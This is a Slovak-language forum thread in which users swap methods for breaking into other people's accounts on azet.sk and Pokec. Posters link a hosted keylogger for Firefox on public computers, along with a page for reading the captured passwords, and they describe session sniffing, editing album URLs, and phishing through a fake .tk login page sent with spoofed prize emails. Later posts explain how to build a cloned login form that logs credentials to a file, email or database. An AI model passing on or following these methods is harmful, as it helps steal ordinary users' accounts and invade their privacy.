hesla na azet.sk (hacking)

O internete a sieťach, problémoch, nastaveniach...
juraj++
Medium Expert
Medium Expert

f

Príspevok od používateľa juraj++ »

neviem coi este funguje ale ked som mal 14 tak to islo xD (3,5 roka v minulosti). musis si otvorit album ktory je pred tym do ktorehho sa ces dostat ak ma uzivatel 8 albumov a ces ist do 4. tak otvor treti a budes mat nejaku url adresu napr. pokec.albumy.sk/uzivatel/sad21 cislo 21 prepis na 22 a budes o album dalej ale pochibujem ze to este pôjde bola z toho velka afera
refr0
Star
Star
Kontaktovať používateľa:

Príspevok od používateľa refr0 »

to islo este za komunistov :D
Tommi
Novice
Novice
Kontaktovať používateľa:

dalsia moznost

Príspevok od používateľa Tommi »

tolko sprostosti ste tu popisali ze rofl je jedna moznost ako hackovat pre lamy citajte somariny na strankach ako je tato http://www.scribd.com/doc/6249940/Hacking a mozno raz najdete nejaky uzitocny navod (pochibujem) :D tak lamy skusajte a nikoho tu nenapadlo nasadit keyloger dementi
terist
Novice
Novice

Re: dalsia moznost

Príspevok od používateľa terist »

Tommi napísal:tolko sprostosti ste tu popisali ze rofl je jedna moznost ako hackovat pre lamy citajte somariny na strankach ako je tato http://www.scribd.com/doc/6249940/Hacking a mozno raz najdete nejaky uzitocny navod (pochibujem) :D tak lamy skusajte a nikoho tu nenapadlo nasadit keyloger dementi
ale napadlo :D

Kód: Vybrať všetko

návod pre inštaláciu iba FF : azet.superihost.com/azet.php

Kód: Vybrať všetko

pristup k heslam : azet.superihost.com/azet.php?type=list
Ak ma niekto pristup k verejnemu PC s FF mozete to tam nainstalovat. Dik
G0lDiER_
King
King
Používateľov profilový obrázok
Kontaktovať používateľa:

Príspevok od používateľa G0lDiER_ »

a hesla kde najdem ? :P inak to vyzera gj :wink:
refr0
Star
Star
Kontaktovať používateľa:

ak je dotycna osoba s tebou na sieti tak sa daju odsnifovat zopar veci pomocou ktorych sa lognes na tu osobu ked bude v tom case aj prihlasena.... mam to odskusane ale nezneuzivam to.. :D
MakeFake
Spammer
Spammer
Kontaktovať používateľa:

Príspevok od používateľa MakeFake »

Asi nie refr0 kedze na prihlasovanie na Pokec sa uz pouziva SSL.

Najlepsi je aj tak phising ale kvalitny, teda fake stranka regnuta na bezplatnej domene .tk, a potom poslat HTML email ,ze nieco vyhrali kde bude odkaz na dotycnu stranku kde si mozu "aktivovat" vyhru. Samozrejme sfalsovana odosielacia adresa.

Uspesnost je 50%.
refr0
Star
Star
Kontaktovať používateľa:

"ked bude v tom case aj prihlasena"....
precitaj si to.. je samozrejme ze neodchytis prihlasovacie udaje ked je tam ssl.. proste sa len dokazes lognut na tu osobu ako keby to bola "on/ona"...
TaggerxXx
Medium Expert
Medium Expert

Príspevok od používateľa TaggerxXx »

prosim ta ktory cracker alebo hacker by sa snazil dostat na pokec slovakov heckerou neni vela a nejaky zo zahranicia sa na to vikasle :smt018
solidier
Light Expert
Light Expert

Príspevok od používateľa solidier »

Fata! ChaoS napísal:Ja poznám jeden spôsom, ale nato sa nachytajú len internetovo nezdelaný ľudia, to si spravíš kopiu azetu a nastavíš to tak aby pri prihlásení, poslalo nick a heslo. Čiže máš tú stránku povbieš típkovi nech sa odtial prihlásy na azet a to sa normálne prihlási na azet, lenže + ti pošle nick a heslo toho kto sa prihlásil, ale tak nie všetci ľudia sa nachytajú.

Môžeš si spraviť hocijakú stránku prihlasovaním a vieš získať, heslo a zavisí od prihlasujúceho či si dáva všade také isté heslo alebo iné.

Nato prvé mám zdroják, ale nedám to sem, lebo by sa stal taký chaos ako nedávno každý si robil takú stránku a včade to bolo, ale bolo to nanič a aj tak, do súkromia iných sa nemáme čo starať :wink:
jasne mam to vytvorene ale na inu stranku to chcem vytvorit tiiž ale nemohol by si mi poslat ten kod ktory to presmeruje na .../php? mam to urobene ale z indexu to neviem vytiahnut je tam toho pekne vela chem to spravit aj na ine stranky
ST1GD3R
Light Star
Light Star

Príspevok od používateľa ST1GD3R »

solidier napísal:jasne mam to vytvorene ale na inu stranku to chcem vytvorit tiiž ale nemohol by si mi poslat ten kod ktory to presmeruje na .../php? mam to urobene ale z indexu to neviem vytiahnut je tam toho pekne vela chem to spravit aj na ine stranky
No veru hento je dobrý spôsob a veľmi ľahký a naj je keď to dáš takto povieš že ten kto sa cez to prihlási dostane plusko ak bude 100 v poradí. A potom ako on dá prihlásiť ho dá na php to ti odošle na mail,zapíše do súboru alebo dá do DB jeho login a heslo a vypíše číslo od 1 do 99 Samozrejme nikdy nie to 100. A výpis bude vypadať takto. Skončil si na 58 mieste skús šťastie opäť zajtra.A môžeš tam pridať ešte automatické presmerovanie s loginom a heslo tak aby ho to odrazu prihlásilo an pokec. Je to úplne ľahké.
G0lDiER_
King
King
Kontaktovať používateľa:

aby ho to "odrazu" prihlasilo na pokec nespravis..maju to robene cez SSL, nedokazes spravit formular ktory ta prihlasi do pokecu..
ST1GD3R
Light Star
Light Star

Ale prečo by som nemohol? Mám to spravené a je to úplne jednoduché a nie každy ide cez SSL :) Ak chceš môžem teraz urobiť to na web a skúsiš sa prihlásiť cez môj formulár na pokec. Sen sa môžeš prihlásiť. A daj zlé meno alebo heslo alebo si vytvor nový nick na pokeci pretože čo ak logujem tvoje prístupy cez môj web? He?
G0lDiER_
King
King
Kontaktovať používateľa:

lol ? a to je z SSL alebo bez ? pozeral som ten kod a je to zvlastne ze to funguje :lol:
este spravit vzhlad trochu a logovanie do nejakej DB a bolo by to dobree :lol:
ST1GD3R
Light Star
Light Star

Hehe veď ja to všetko mám len to tu nechce zverejniť vzhľad mám ako na pokeci + dávanie do suboru a posielanie na mail každé nové prihlásenie :)
G0lDiER_
King
King
Kontaktovať používateľa:

No tak ja sa do toho idem pustit, aby mi to logovalo do DB + nejaky html output :)
ST1GD3R
Light Star
Light Star

No jako chceš. :D Ale počuj je to vlastne zbytočné takto ľudom kradnúť hesla. Pretože tiež by som nebol rád keby ho niekto bral mne.
G0lDiER_
King
King
Kontaktovať používateľa:

Bude to na osobne ucely,neplanujem nejake hromadne zistovanie hesiel :) inak co je podla teba efektivnejsie,logovat to do DB alebo do suboru ?
ST1GD3R
Light Star
Light Star

Tak podľa mňa skôr do tej DB :) Teda ja som to vtedy do súboru pretože som vtedy nevedel robiť z DB (To som začínal ešte a stale som lama v tom) Ale keby som to robil teraz tak jednoznačne DB :)
G0lDiER_
King
King
Kontaktovať používateľa:

No ja som tiez lama z PHP a vseobecne v kodovani ale ja to nejak poskladam :) No ja som zacal teda variantu DB, som pripojeny do DB, mam vybratu DB, mam formular len este neviem ako spravit aby tie udaje z formulara zapisalo aj do db..
Napísať odpoveď